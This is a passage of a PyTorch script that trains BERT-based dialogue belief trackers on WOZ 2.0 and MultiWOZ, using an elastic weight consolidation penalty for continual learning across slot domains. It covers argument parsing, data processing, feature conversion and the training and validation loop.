    return all_input_ids, all_input_len, all_label_ids, all_prev_label_ids


def get_label_embedding(labels, max_seq_length, tokenizer, device):
    features = []
    for label in labels:
        label_tokens = ["[CLS]"] + tokenizer.tokenize(label) + ["[SEP]"]
        label_token_ids = tokenizer.convert_tokens_to_ids(label_tokens)
        label_len = len(label_token_ids)

        label_padding = [0] * (max_seq_length - len(label_token_ids))
        label_token_ids += label_padding
        assert len(label_token_ids) == max_seq_length

        features.append((label_token_ids, label_len))

    all_label_token_ids = torch.tensor([f[0] for f in features], dtype=torch.long).to(device)
    all_label_len = torch.tensor([f[1] for f in features], dtype=torch.long).to(device)

    return all_label_token_ids, all_label_len


def _truncate_seq_pair(tokens_a, tokens_b, max_length):
    """Truncates a sequence pair in place to the maximum length."""
    while True:
        total_length = len(tokens_a) + len(tokens_b)
        if total_length <= max_length:
            break
        if len(tokens_a) > len(tokens_b):
            tokens_a.pop()
        else:
            tokens_b.pop()


###############################################################################
# Miscellaneous functions
###############################################################################

def accuracy(out, labels):
    outputs = np.argmax(out, axis=1)
    return np.sum(outputs == labels)


def warmup_linear(x, warmup=0.002):
    if x < warmup:
        return x / warmup
    return 1.0 - x

def main():
    parser = argparse.ArgumentParser()

    ## Required parameters
    parser.add_argument('--data_dir', type=str, required=True,
                        help='location of the data corpus')
    parser.add_argument("--bert_model", default=None, type=str, required=True,
                        help="Bert pre-trained model selected in the list: bert-base-uncased, "
                             "bert-large-uncased, bert-base-cased, bert-large-cased, "
                             "bert-base-multilingual-uncased, bert-base-multilingual-cased, bert-base-chinese.")
    parser.add_argument("--bert_dir", default='/gfs/nlp/.pytorch_pretrained_bert', type=str, required=False,
                        help="The directory of the pretrained BERT model")
    parser.add_argument("--task_name", default=None, type=str, required=True,
                        help="The name of the task to train: bert, bert-gru, bert-lstm, "
                             "bert-label-embedding, bert-gru-label-embedding, bert-lstm-label-embedding")
    parser.add_argument("--output_dir", default=None, type=str, required=True,
                        help="The output directory where the model predictions and checkpoints will be written.")
    parser.add_argument('--load_path', type=str, default='',
                        help='pretrained model directory name')
    parser.add_argument("--target_slot", default='', type=str, required=True,
                        help="Target slot idx to train model, e.g. '0:1:2', or an excluding slot name, e.g. 'attraction'")
    parser.add_argument("--prev_slot", default='', type=str, required=True,
                        help="Previously trained slot idx, in the same format as --target_slot")
    parser.add_argument("--tf_dir", default='tensorboard', type=str, required=False,
                        help="Tensorboard directory")
    parser.add_argument("--nbt", default='rnn', type=str, required=True,
                        help="nbt type: rnn or transformer")

    ## Other parameters
    parser.add_argument("--max_seq_length", default=64, type=int,
                        help="The maximum total input sequence length after WordPiece tokenization. \n"
                             "Sequences longer than this will be truncated, and sequences shorter \n"
                             "than this will be padded.")
    parser.add_argument("--max_label_length", default=32, type=int,
                        help="The maximum total input sequence length after WordPiece tokenization. \n"
                             "Sequences longer than this will be truncated, and sequences shorter \n"
                             "than this will be padded.")
    parser.add_argument("--max_turn_length", default=22, type=int,
                        help="The maximum total input turn length. \n"
                             "Sequences longer than this will be truncated.")
    parser.add_argument('--hidden_dim', type=int, default=100,
                        help="hidden dimension used in belief tracker")
    parser.add_argument('--num_rnn_layers', type=int, default=1,
                        help="number of RNN layers")
    parser.add_argument('--zero_init_rnn', action='store_true',
                        help="set initial hidden of rnns zero")
    parser.add_argument('--skip_connect', type=str, default=False,
                        help="skip-connection")
    parser.add_argument('--attn_head', type=int, default=4,
                        help="the number of heads in multi-headed attention")
    parser.add_argument("--distance_metric", type=str, default="cosine",
                        help="The metric for distance between label embeddings: cosine or euclidean")
    parser.add_argument("--do_train", action='store_true',
                        help="Whether to run training.")
    parser.add_argument("--do_eval", action='store_true',
                        help="Whether to run eval on the test set.")
    parser.add_argument("--do_analyze", action='store_true',
                        help="Whether to run analysis on the test set.")
    parser.add_argument("--do_lower_case", action='store_true',
                        help="Set this flag if you are using an uncased model.")
    parser.add_argument("--set_label_encoder_trainable", action='store_true',
                        help="Set this flag if you want to set the label encoder trainable. \n"
                             "This option is valid only when using label embeddings. \n")
    parser.add_argument("--train_batch_size", default=4, type=int,
                        help="Total batch size for training.")
    parser.add_argument("--dev_batch_size", default=1, type=int,
                        help="Total batch size for validation.")
    parser.add_argument("--eval_batch_size", default=16, type=int,
                        help="Total batch size for eval.")
    parser.add_argument("--learning_rate", default=5e-5, type=float,
                        help="The initial learning rate for Adam.")
    parser.add_argument("--num_train_epochs", default=3.0, type=float,
                        help="Total number of training epochs to perform.")
    parser.add_argument("--patience", default=10.0, type=float,
                        help="The number of epochs to allow no further improvement.")
    parser.add_argument("--warmup_proportion", default=0.1, type=float,
                        help="Proportion of training to perform linear learning rate warmup for. "
                             "E.g., 0.1 = 10%% of training.")
    parser.add_argument("--lambda_ewc", default=0.1, type=float,
                        help="Hyper-parameter for EWC")
    parser.add_argument("--no_cuda", action='store_true',
                        help="Whether not to use CUDA when available")
    parser.add_argument("--local_rank", type=int, default=-1,
                        help="local_rank for distributed training on gpus")
    parser.add_argument('--seed', type=int, default=42,
                        help="random seed for initialization")
    parser.add_argument('--gradient_accumulation_steps', type=int, default=1,
                        help="Number of updates steps to accumulate before performing a backward/update pass.")
    parser.add_argument('--fp16', action='store_true',
                        help="Whether to use 16-bit float precision instead of 32-bit")
    parser.add_argument('--loss_scale', type=float, default=0,
                        help="Loss scaling to improve fp16 numeric stability. Only used when fp16 set to True.\n"
                             "0 (default value): dynamic loss scaling.\n"
                             "Positive power of 2: static loss scaling value.\n")
    parser.add_argument("--do_not_use_tensorboard", action='store_true',
                        help="Whether to run without tensorboard logging")

    args = parser.parse_args()

    # check output_dir
    if os.path.exists(args.output_dir) and os.listdir(args.output_dir) and args.do_train:
        raise ValueError("Output directory ({}) already exists and is not empty.".format(args.output_dir))
    os.makedirs(args.output_dir, exist_ok=True)

    task_name = args.task_name.lower()
    tb_file_name = args.output_dir.split('/')[1]

    # Tensorboard logging
    if not args.do_not_use_tensorboard:
        summary_writer = SummaryWriter("./%s/%s" % (args.tf_dir, tb_file_name))
    else:
        summary_writer = None

    fileHandler = logging.FileHandler(os.path.join(args.output_dir, "%s.txt" % tb_file_name))
    logger.addHandler(fileHandler)
    logger.info(args)

    # CUDA setting
    if args.local_rank == -1 or args.no_cuda:
        device = torch.device("cuda" if torch.cuda.is_available() and not args.no_cuda else "cpu")
        n_gpu = torch.cuda.device_count()
    else:
        torch.cuda.set_device(args.local_rank)
        device = torch.device("cuda", args.local_rank)
        n_gpu = 1
        # Initializes the distributed backend which will take care of sychronizing nodes/GPUs
        torch.distributed.init_process_group(backend='nccl')
    logger.info("device: {} n_gpu: {}, distributed training: {}, 16-bits training: {}".format(
        device, n_gpu, bool(args.local_rank != -1), args.fp16))

    if args.gradient_accumulation_steps < 1:
        raise ValueError("Invalid gradient_accumulation_steps parameter: {}, should be >= 1".format(
            args.gradient_accumulation_steps))
    args.train_batch_size = int(args.train_batch_size / args.gradient_accumulation_steps)

    random.seed(args.seed)
    np.random.seed(args.seed)
    torch.manual_seed(args.seed)
    if n_gpu > 0:
        torch.cuda.manual_seed_all(args.seed)

    if not args.do_train and not args.do_eval:
        raise ValueError("At least one of `do_train` or `do_eval` must be True.")

    ###############################################################################
    # Load data
    ###############################################################################

    # Get Processor
    processor = Processor(args)
    prev_label_list = processor.get_prev_labels()      # Slot value labels of previous tasks
    target_label_list = processor.get_labels()         # Slot value labels of the present task
    label_list = prev_label_list + target_label_list   # All slot value labels
    num_labels = [len(labels) for labels in label_list]  # Number of labels of all slots

    #prev_slot_id = processor.prev_slot_idx      # wrong
    #target_slot_id = processor.target_slot_idx  # wrong
    prev_slot_id = list(range(0, len(processor.prev_slot)))                          # list of slots in previous tasks
    target_slot_id = list(range(len(processor.prev_slot), len(processor.all_slot)))  # list of slots in the present task

    # tokenizer
    vocab_dir = os.path.join(args.bert_dir, '%s-vocab.txt' % args.bert_model)
    if not os.path.exists(vocab_dir):
        raise ValueError("Can't find %s " % vocab_dir)
    tokenizer = BertTokenizer.from_pretrained(vocab_dir, do_lower_case=args.do_lower_case)

    num_train_steps = None
    accumulation = False

    if args.do_train:
        train_examples = processor.get_train_examples(args.data_dir, accumulation=accumulation)
        dev_examples = processor.get_dev_examples(args.data_dir, accumulation=accumulation)
        num_train_steps = int(len(train_examples) / args.train_batch_size * args.num_train_epochs)
        num_dev_steps = int(len(dev_examples) / args.dev_batch_size * args.num_train_epochs)

        ## Train utterances
        all_input_ids, all_input_len, all_label_ids, all_prev_label_ids = convert_examples_to_features(
            train_examples, target_label_list, prev_label_list, args.max_seq_length, tokenizer, args.max_turn_length)
        logger.info("***** Running training *****")
        logger.info("  Num examples = %d", len(train_examples))
        logger.info("  Batch size = %d", args.train_batch_size)
        logger.info("  Num steps = %d", num_train_steps)

        all_input_ids, all_input_len, all_label_ids, all_prev_label_ids = \
            all_input_ids.to(device), all_input_len.to(device), all_label_ids.to(device), all_prev_label_ids.to(device)

        train_data = TensorDataset(all_input_ids, all_input_len, all_label_ids, all_prev_label_ids)
        if args.local_rank == -1:
            train_sampler = RandomSampler(train_data)
        else:
            train_sampler = DistributedSampler(train_data)
        train_dataloader = DataLoader(train_data, sampler=train_sampler, batch_size=args.train_batch_size)

        ## Dev utterances
        all_input_ids_dev, all_input_len_dev, all_label_ids_dev, all_prev_label_ids_dev = convert_examples_to_features(
            dev_examples, target_label_list, prev_label_list, args.max_seq_length, tokenizer, args.max_turn_length)
        logger.info("***** Running validation *****")
        logger.info("  Num examples = %d", len(dev_examples))
        logger.info("  Batch size = %d", args.dev_batch_size)
        logger.info("  Num steps = %d", num_dev_steps)

        all_input_ids_dev, all_input_len_dev, all_label_ids_dev, all_prev_label_ids_dev = \
            all_input_ids_dev.to(device), all_input_len_dev.to(device), all_label_ids_dev.to(device), all_prev_label_ids_dev.to(device)

        dev_data = TensorDataset(all_input_ids_dev, all_input_len_dev, all_label_ids_dev, all_prev_label_ids_dev)
        dev_sampler = SequentialSampler(dev_data)
        dev_dataloader = DataLoader(dev_data, sampler=dev_sampler, batch_size=args.dev_batch_size)

    logger.info("Loaded data!")
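
    # Small illustration of the slot-id bookkeeping above (values made up):
    # slot ids index positions in the concatenated [previous slots + target
    # slots] ordering used by the model, not the raw ontology indices passed
    # on the command line.
    def _example_slot_ids():
        prev_slot = ['area', 'food', 'price range']  # hypothetical previous task
        all_slot = prev_slot + ['parking', 'stars']  # plus hypothetical target task
        assert list(range(0, len(prev_slot))) == [0, 1, 2]           # prev_slot_id
        assert list(range(len(prev_slot), len(all_slot))) == [3, 4]  # target_slot_id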

    ###############################################################################
    # Build the models
    ###############################################################################

    # Prepare model
    if args.nbt == 'rnn':
        from BeliefTrackerSlotQueryMultiSlot import BeliefTracker
        if args.task_name.find("gru") == -1 and args.task_name.find("lstm") == -1:
            raise ValueError("Task name should include at least \"gru\" or \"lstm\"")
    elif args.nbt == 'turn':
        from BeliefTrackerSlotQueryMultiSlotTurn import BeliefTracker
    elif args.nbt == 'transformer':
        from BeliefTrackerSlotQueryMultiSlotTransformer import BeliefTracker
    else:
        raise ValueError('nbt type should be either rnn or transformer')
    from BeliefTrackerSlotQueryMultiSlotEWC import EWC

    model = BeliefTracker(args, num_labels, device)
    if args.fp16:
        model.half()

    # Load pretrained model,
    # in the case that slots and values are different between training and evaluation
    ptr_model = torch.load(args.load_path, map_location=device)
    del_list = []
    rename_list = []
    for key in ptr_model.keys():
        if ('slot_lookup' in key) or ('value_lookup' in key):  # remove slot_lookup and value_lookup
            del_list.append(key)
        if ('rnn.' in key):  # rename rnn -> nbt
            rename_list.append(key)
    for key in del_list:
        del ptr_model[key]
    for key in rename_list:
        new_key = key.replace('rnn.', 'nbt.')
        ptr_model[new_key] = ptr_model[key]
        del ptr_model[key]

    state = model.state_dict()
    state.update(ptr_model)
    model.load_state_dict(state)
    model.to(device)

    ## Get slot-value embeddings
    label_token_ids, label_len = [], []
    for labels in label_list:
        token_ids, lens = get_label_embedding(labels, args.max_label_length, tokenizer, device)
        label_token_ids.append(token_ids)
        label_len.append(lens)

    ## Get slot-type embeddings
    ## Note: slot embeddings are ordered as [previous slots + present target slots]
    slot_token_ids, slot_len = \
        get_label_embedding(processor.all_slot, args.max_label_length, tokenizer, device)

    model.initialize_slot_value_lookup(label_token_ids, label_len, slot_token_ids, slot_len)

    if args.local_rank != -1:
        try:
            from apex.parallel import DistributedDataParallel as DDP
        except ImportError:
            raise ImportError(
                "Please install apex from https://www.github.com/nvidia/apex to use distributed and fp16 training.")
        model = DDP(model)
    elif n_gpu > 1:
        model = torch.nn.DataParallel(model)

    # Prepare optimizer
    if args.do_train:
        def get_optimizer_grouped_parameters(model):
            param_optimizer = [(n, p) for n, p in model.named_parameters() if p.requires_grad]
            no_decay = ['bias', 'LayerNorm.bias', 'LayerNorm.weight']
            optimizer_grouped_parameters = [
                {'params': [p for n, p in param_optimizer if not any(nd in n for nd in no_decay)],
                 'weight_decay': 0.01, 'lr': args.learning_rate},
                {'params': [p for n, p in param_optimizer if any(nd in n for nd in no_decay)],
                 'weight_decay': 0.0, 'lr': args.learning_rate},
            ]
            return optimizer_grouped_parameters

        if n_gpu == 1:
            optimizer_grouped_parameters = get_optimizer_grouped_parameters(model)
        else:
            optimizer_grouped_parameters = get_optimizer_grouped_parameters(model.module)

        t_total = num_train_steps
        if args.local_rank != -1:
            t_total = t_total // torch.distributed.get_world_size()

        if args.fp16:
            try:
                from apex.optimizers import FP16_Optimizer
                from apex.optimizers import FusedAdam
            except ImportError:
                raise ImportError(
                    "Please install apex from https://www.github.com/nvidia/apex to use distributed and fp16 training.")

            optimizer = FusedAdam(optimizer_grouped_parameters,
                                  lr=args.learning_rate,
                                  bias_correction=False,
                                  max_grad_norm=1.0)
            if args.loss_scale == 0:
                optimizer = FP16_Optimizer(optimizer, dynamic_loss_scale=True)
            else:
                optimizer = FP16_Optimizer(optimizer, static_loss_scale=args.loss_scale)
        else:
            optimizer = BertAdam(optimizer_grouped_parameters,
                                 lr=args.learning_rate,
                                 warmup=args.warmup_proportion,
                                 t_total=t_total)
        logger.info(optimizer)

    ###############################################################################
    # Training code
    ###############################################################################

    if args.do_train:
        logger.info("Training...")

        global_step = 0
        last_update = None
        best_loss = None

        #### EWC: calculate the Fisher information on the previous task
        ewc = EWC(model, dev_dataloader, oldtask=prev_slot_id, num_labels=num_labels,
                  device=device, n_gpu=n_gpu)

        for epoch in trange(int(args.num_train_epochs), desc="Epoch"):
            #### TRAIN
            model.train()
            tr_loss = 0
            nb_tr_examples, nb_tr_steps = 0, 0

            for step, batch in enumerate(tqdm(train_dataloader, desc="Iteration")):
                batch = tuple(t.to(device) for t in batch)
                input_ids, input_len, label_ids, _ = batch

                if n_gpu == 1:
                    loss_, loss_slot, acc, acc_slot, _ = model(
                        input_ids, input_len, label_ids, n_gpu, target_slot=target_slot_id)
                    loss_ewc = ewc.penalty(model)
                    loss = loss_ + args.lambda_ewc * loss_ewc
                else:
                    loss_, _, acc, acc_slot, _ = model(
                        input_ids, input_len, label_ids, n_gpu, target_slot=target_slot_id)
                    loss_ = loss_.mean()
                    acc = acc.mean()
                    acc_slot = acc_slot.mean(0)
                    loss_ewc = ewc.penalty(model)
                    loss = loss_ + args.lambda_ewc * loss_ewc

                if args.gradient_accumulation_steps > 1:
                    loss = loss / args.gradient_accumulation_steps

                if args.fp16:
                    optimizer.backward(loss)
                else:
                    loss.backward()

                if summary_writer is not None:
                    summary_writer.add_scalar("Epoch", epoch, global_step)
                    summary_writer.add_scalar("Train/Loss", loss_, global_step)
                    summary_writer.add_scalar("Train/Loss_EWC", loss_ewc, global_step)
                    summary_writer.add_scalar("Train/Loss_Total", loss, global_step)
                    summary_writer.add_scalar("Train/JointAcc", acc, global_step)
                    if n_gpu == 1:
                        for i, slot in enumerate(processor.target_slot):
                            summary_writer.add_scalar("Train/Loss_%s" % slot.replace(' ', '_'),
                                                      loss_slot[i], global_step)
                            summary_writer.add_scalar("Train/Acc_%s" % slot.replace(' ', '_'),
                                                      acc_slot[i], global_step)

                tr_loss += loss.item()
                nb_tr_examples += input_ids.size(0)
                nb_tr_steps += 1

                if (step + 1) % args.gradient_accumulation_steps == 0:
                    # modify learning rate with special warm up BERT uses
                    lr_this_step = args.learning_rate * warmup_linear(global_step / t_total, args.warmup_proportion)
                    if summary_writer is not None:
                        summary_writer.add_scalar("Train/LearningRate", lr_this_step, global_step)
                    for param_group in optimizer.param_groups:
                        param_group['lr'] = lr_this_step
                    optimizer.step()
                    optimizer.zero_grad()
                    global_step += 1

            # Perform evaluation on the validation dataset
            model.eval()
            dev_loss = 0
            dev_acc = 0
            dev_loss_slot, dev_acc_slot = None, None
            nb_dev_examples, nb_dev_steps = 0, 0
            prev_dev_loss = 0
            prev_dev_acc = 0
            prev_dev_loss_slot, prev_dev_acc_slot = None, None
            prev_nb_dev_examples = 0

            for step, batch in enumerate(tqdm(dev_dataloader, desc="Validation")):
                batch = tuple(t.to(device) for t in batch)
                input_ids, input_len, label_ids, prev_label_ids = batch
                if input_ids.dim() == 2:
                    input_ids = input_ids.unsqueeze(0)
                    input_len = input_len.unsqueeze(0)
                    label_ids = label_ids.unsqueeze(0)
                    prev_label_ids = prev_label_ids.unsqueeze(0)

                with torch.no_grad():
                    if n_gpu == 1:
                        loss_, loss_slot, acc, acc_slot, _ = model(
                            input_ids, input_len, label_ids, n_gpu, target_slot=target_slot_id)
                        loss = loss_ + args.lambda_ewc * ewc.penalty(model)
                        prev_loss, prev_loss_slot, prev_acc, prev_acc_slot, _ = model(
                            input_ids, input_len, prev_label_ids, n_gpu, target_slot=prev_slot_id)
                    else:
                        loss_, _, acc, acc_slot, _ = model(
                            input_ids, input_len, label_ids, n_gpu, target_slot=target_slot_id)
                        loss_ = loss_.mean()
                        acc = acc.mean()
                        acc_slot = acc_slot.mean(0)
                        loss = loss_ + args.lambda_ewc * ewc.penalty(model)
                        prev_loss, _, prev_acc, prev_acc_slot, _ = model(
                            input_ids, input_len, prev_label_ids, n_gpu, target_slot=prev_slot_id)
                        prev_loss = prev_loss.mean()
                        prev_acc = prev_acc.mean()
                        prev_acc_slot = prev_acc_slot.mean(0)

                num_valid_turn = torch.sum(label_ids[:, :, 0].view(-1) > -1, 0).item()
                dev_loss += loss.item() * num_valid_turn
                dev_acc += acc.item() * num_valid_turn

                prev_num_valid_turn = torch.sum(prev_label_ids[:, :, 0].view(-1) > -1, 0).item()
                prev_dev_loss += prev_loss.item() * prev_num_valid_turn
                prev_dev_acc += prev_acc.item() * prev_num_valid_turn

                if n_gpu == 1:
                    if dev_loss_slot is None:
                        dev_loss_slot = [l * num_valid_turn for l in loss_slot]
                        dev_acc_slot = acc_slot * num_valid_turn
                        prev_dev_loss_slot = [l * prev_num_valid_turn for l in prev_loss_slot]
                        prev_dev_acc_slot = prev_acc_slot * prev_num_valid_turn
                    else:
                        for i, l in enumerate(loss_slot):
                            dev_loss_slot[i] = dev_loss_slot[i] + l * num_valid_turn
                        dev_acc_slot += acc_slot * num_valid_turn
                        for i, l in enumerate(prev_loss_slot):
                            prev_dev_loss_slot[i] = prev_dev_loss_slot[i] + l * prev_num_valid_turn
                        prev_dev_acc_slot += prev_acc_slot * prev_num_valid_turn

                nb_dev_examples += num_valid_turn
                prev_nb_dev_examples += prev_num_valid_turn

            dev_loss = dev_loss / nb_dev_examples
            dev_acc = dev_acc / nb_dev_examples
            prev_dev_loss = prev_dev_loss / prev_nb_dev_examples
            prev_dev_acc = prev_dev_acc / prev_nb_dev_examples
            if n_gpu == 1:
                dev_acc_slot = dev_acc_slot / nb_dev_examples
                prev_dev_acc_slot = prev_dev_acc_slot / prev_nb_dev_examples

            if summary_writer is not None:
                summary_writer.add_scalar("Validate/Loss", dev_loss, global_step)
                summary_writer.add_scalar("Validate/Acc", dev_acc, global_step)
                summary_writer.add_scalar("Validate/Prev_Loss", prev_dev_loss, global_step)
                summary_writer.add_scalar("Validate/Prev_Acc", prev_dev_acc, global_step)
                if n_gpu == 1:
                    for i, slot in enumerate(processor.target_slot):
                        summary_writer.add_scalar("Validate/Loss_%s" % slot.replace(' ', '_'),
                                                  dev_loss_slot[i] / nb_dev_examples, global_step)
                        summary_writer.add_scalar("Validate/Acc_%s" % slot.replace(' ', '_'),
                                                  dev_acc_slot[i], global_step)
                    for i, slot in enumerate(processor.prev_slot):
                        summary_writer.add_scalar("Validate/Prev_Loss_%s" % slot.replace(' ', '_'),
                                                  prev_dev_loss_slot[i] / prev_nb_dev_examples, global_step)
                        summary_writer.add_scalar("Validate/Prev_Acc_%s" % slot.replace(' ', '_'),
                                                  prev_dev_acc_slot[i], global_step)

            logger.info("*** Model Updated: Epoch=%d, Valid loss=%.6f, Valid acc=%.6f, "
                        "Valid prev loss=%.6f, Valid prev acc=%.6f ***"
                        % (epoch, dev_loss, dev_acc, prev_dev_loss, prev_dev_acc))

            dev_loss = round(dev_loss, 6)
            if last_update is None or dev_loss < best_loss:
                # Save a trained model
                output_model_file = os.path.join(args.output_dir, "pytorch_model.bin")
                if args.do_train:
                    if n_gpu == 1:
                        torch.save(model.state_dict(), output_model_file)
                    else:
                        torch.save(model.module.state_dict(), output_model_file)

                last_update = epoch
                best_loss = dev_loss
                best_acc = dev_acc
                logger.info("*** Model Updated: Epoch=%d, Validation Loss=%.6f, Validation Acc=%.6f ***"
                            % (last_update, best_loss, best_acc))

            if last_update + args.patience <= epoch:
                break
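
    # The EWC object above comes from BeliefTrackerSlotQueryMultiSlotEWC and
    # is not reproduced in this file. As a rough, hedged sketch of what
    # `ewc.penalty(model)` computes: standard elastic weight consolidation
    # keeps a diagonal Fisher estimate and a snapshot of the parameters
    # learned on the previous task, and penalizes movement away from that
    # snapshot. The helper below is illustrative only, not the actual class.
    def _ewc_penalty_sketch(model, fisher, old_params):
        # fisher/old_params: dicts mapping parameter name -> tensor
        penalty = 0.0
        for name, param in model.named_parameters():
            if name in fisher:
                penalty = penalty + (fisher[name] * (param - old_params[name]) ** 2).sum()
        return penalty  # the train loss then becomes loss_ + args.lambda_ewc * penalty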
class DataProcessor(object):
    """Base class for data converters for sequence classification data sets."""

    def get_train_examples(self, data_dir):
        """Gets a collection of `InputExample`s for the train set."""
        raise NotImplementedError()

    def get_dev_examples(self, data_dir):
        """Gets a collection of `InputExample`s for the dev set."""
        raise NotImplementedError()

    def get_labels(self):
        """Gets the list of labels for this data set."""
        raise NotImplementedError()

    @classmethod
    def _read_tsv(cls, input_file, quotechar=None):
        """Reads a tab separated value file."""
        with open(input_file, "r", encoding='utf-8') as f:
            reader = csv.reader(f, delimiter="\t", quotechar=quotechar)
            lines = []
            for line in reader:
                if len(line) > 0 and line[0][0] == '#':  # ignore comments (starting with '#')
                    continue
                lines.append(line)
            return lines
class Processor(DataProcessor):
    """Processor for the belief tracking dataset (WOZ 2.0 and MultiWOZ)."""

    def __init__(self, config):
        super(Processor, self).__init__()

        # WOZ 2.0 dataset
        if config.data_dir == "data/woz" or config.data_dir == "data/woz-turn":
            fp_ontology = open(os.path.join(config.data_dir, "ontology_dstc2_en.json"), "r")
            ontology = json.load(fp_ontology)
            ontology = ontology["informable"]
            del ontology["request"]
            for slot in ontology.keys():
                ontology[slot].append("do not care")
                ontology[slot].append("none")
            fp_ontology.close()

        # MultiWOZ dataset
        elif config.data_dir == "data/multiwoz":
            fp_ontology = open(os.path.join(config.data_dir, "ontology.json"), "r")
            ontology = json.load(fp_ontology)
            for slot in ontology.keys():
                ontology[slot].append("none")
            fp_ontology.close()

            if not config.target_slot == 'all':
                slot_idx = {'attraction': '0:1:2', 'bus': '3:4:5:6', 'hospital': '7',
                            'hotel': '8:9:10:11:12:13:14:15:16:17',
                            'restaurant': '18:19:20:21:22:23:24',
                            'taxi': '25:26:27:28', 'train': '29:30:31:32:33:34'}
                target_slot = []
                prev_slot = []
                for key, value in slot_idx.items():
                    if key == config.target_slot:
                        target_slot.append(value)
                    else:
                        prev_slot.append(value)
                config.target_slot = ':'.join(target_slot)
                config.prev_slot = ':'.join(prev_slot)
        else:
            raise NotImplementedError()

        # sorting the ontology according to the alphabetic order of the slots
        self.ontology = collections.OrderedDict(sorted(ontology.items()))

        # select slots to train
        self.target_slot = []
        self.prev_slot = []
        self.target_slot_idx = sorted([int(x) for x in config.target_slot.split(':')])
        self.prev_slot_idx = sorted([int(x) for x in config.prev_slot.split(':')])

        ontology_items = list(self.ontology.items())
        for idx, domain in enumerate(ontology_items):
            slot, value = domain
            if slot == "pricerange":
                slot = "price range"
            if idx in self.target_slot_idx:
                self.target_slot.append(slot)
            elif idx in self.prev_slot_idx:
                self.prev_slot.append(slot)

        self.all_slot = self.prev_slot + self.target_slot
        logger.info('Processor: previous slots: ' + ', '.join(self.prev_slot))
        logger.info('Processor: target slots: ' + ', '.join(self.target_slot))

    def get_train_examples(self, data_dir, accumulation=False):
        """See base class."""
        return self._create_examples(
            self._read_tsv(os.path.join(data_dir, "train.tsv")), "train", accumulation)

    def get_dev_examples(self, data_dir, accumulation=False):
        """See base class."""
        return self._create_examples(
            self._read_tsv(os.path.join(data_dir, "dev.tsv")), "dev", accumulation)

    def get_test_examples(self, data_dir, accumulation=False):
        """See base class."""
        return self._create_examples(
            self._read_tsv(os.path.join(data_dir, "test.tsv")), "test", accumulation)

    def get_labels(self):
        """See base class."""
        return [self.ontology[slot] for slot in self.target_slot]

    def get_prev_labels(self):
        """See base class."""
        return [self.ontology[slot] for slot in self.prev_slot]

    def _create_examples(self, lines, set_type, accumulation=False):
        """Creates examples for the training, dev and test sets."""
        prev_dialogue_index = None
        examples = []
        for (i, line) in enumerate(lines):
            guid = "%s-%s-%s" % (set_type, line[0], line[1])  # line[0]: dialogue index, line[1]: turn index
            if accumulation:
                if prev_dialogue_index is None or prev_dialogue_index != line[0]:
                    text_a = line[2]
                    text_b = line[3]
                    prev_dialogue_index = line[0]
                else:
                    # The symbol '#' will be replaced with '[SEP]' after tokenization.
                    text_a = line[2] + " # " + text_a
                    text_b = line[3] + " # " + text_b
            else:
                text_a = line[2]  # line[2]: user utterance
                text_b = line[3]  # line[3]: system response

            # Slot values are assumed to follow the two utterances in the TSV layout.
            label = [line[4 + idx] for idx in self.target_slot_idx]
            prev_label = [line[4 + idx] for idx in self.prev_slot_idx]

            examples.append(InputExample(guid=guid, text_a=text_a, text_b=text_b,
                                         label=label, prev_label=prev_label))
        return examples
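# Worked example of the MultiWOZ slot partition above: running with
# --target_slot hotel assigns ontology indices 8..17 to the current task and
# every other domain's indices to the previous tasks, i.e.
#   config.target_slot = '8:9:10:11:12:13:14:15:16:17'
#   config.prev_slot   = '0:1:2:...:7:18:19:...:34'  (all remaining indices)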
def convert_examples_to_features(examples, label_list, prev_label_list,
                                 max_seq_length, tokenizer, max_turn_length):
    """Loads a data file into a list of `InputBatch`s."""

    slot_dim = len(label_list)
    prev_slot_dim = len(prev_label_list)

    def _hard_coding_label(label):
        return 'do not care' if label == 'dontcare' else label

    def _get_label(label, label_list):
        label_id = []
        label_info = ''
        label_map = [{_label: i for i, _label in enumerate(labels)} for labels in label_list]
        for i, label in enumerate(label):
            label = _hard_coding_label(label)
            label_id.append(label_map[i][label])
            label_info += '%s (id = %d) ' % (label, label_map[i][label])
        return label_id, label_info

    features = []
    prev_dialogue_idx = None
    all_padding = [0] * max_seq_length
    all_padding_len = [0, 0]

    max_turn = 0
    for (ex_index, example) in enumerate(examples):
        if max_turn < int(example.guid.split('-')[2]):
            max_turn = int(example.guid.split('-')[2])
    max_turn_length = min(max_turn + 1, max_turn_length)
    logger.info("max_turn_length = %d" % max_turn)

    for (ex_index, example) in enumerate(examples):
        tokens_a = [x if x != '#' else '[SEP]' for x in tokenizer.tokenize(example.text_a)]
        tokens_b = None
        if example.text_b:
            tokens_b = [x if x != '#' else '[SEP]' for x in tokenizer.tokenize(example.text_b)]
            _truncate_seq_pair(tokens_a, tokens_b, max_seq_length - 3)
        else:
            # Account for [CLS] and [SEP] with "- 2"
            if len(tokens_a) > max_seq_length - 2:
                tokens_a = tokens_a[:(max_seq_length - 2)]

        tokens = ["[CLS]"] + tokens_a + ["[SEP]"]
        input_len = [len(tokens), 0]
        if tokens_b:
            tokens += tokens_b + ["[SEP]"]
            input_len[1] = len(tokens_b) + 1

        input_ids = tokenizer.convert_tokens_to_ids(tokens)

        # Zero-pad up to the sequence length.
        input_ids += [0] * (max_seq_length - len(input_ids))  # Note: padding idx = 0
        assert len(input_ids) == max_seq_length

        label_id, label_info = _get_label(example.label, label_list)
        prev_label_id, prev_label_info = _get_label(example.prev_label, prev_label_list)

        if ex_index < 5:
            logger.info("*** Example ***")
            logger.info("guid: %s" % example.guid)
            logger.info("tokens: %s" % " ".join([str(x) for x in tokens]))
            logger.info("input_ids: %s" % " ".join([str(x) for x in input_ids]))
            logger.info("input_len: %s" % " ".join([str(x) for x in input_len]))
            logger.info("label: %s" % label_info)
            logger.info("previous label: %s" % prev_label_info)

        curr_dialogue_idx = example.guid.split('-')[1]
        curr_turn_idx = int(example.guid.split('-')[2])

        # When a new dialogue starts, pad the previous one out to max_turn_length.
        if (prev_dialogue_idx is not None) and (prev_dialogue_idx != curr_dialogue_idx):
            if prev_turn_idx < max_turn_length:
                features += [InputFeatures(input_ids=all_padding,
                                           input_len=all_padding_len,
                                           label_id=[-1] * slot_dim,
                                           prev_label_id=[-1] * prev_slot_dim)] \
                            * (max_turn_length - prev_turn_idx - 1)
            assert len(features) % max_turn_length == 0

        if curr_turn_idx < max_turn_length:
            features.append(InputFeatures(input_ids=input_ids,
                                          input_len=input_len,
                                          label_id=label_id,
                                          prev_label_id=prev_label_id))

        prev_dialogue_idx = curr_dialogue_idx
        prev_turn_idx = curr_turn_idx

    if prev_turn_idx < max_turn_length:
        features += [InputFeatures(input_ids=all_padding,
                                   input_len=all_padding_len,
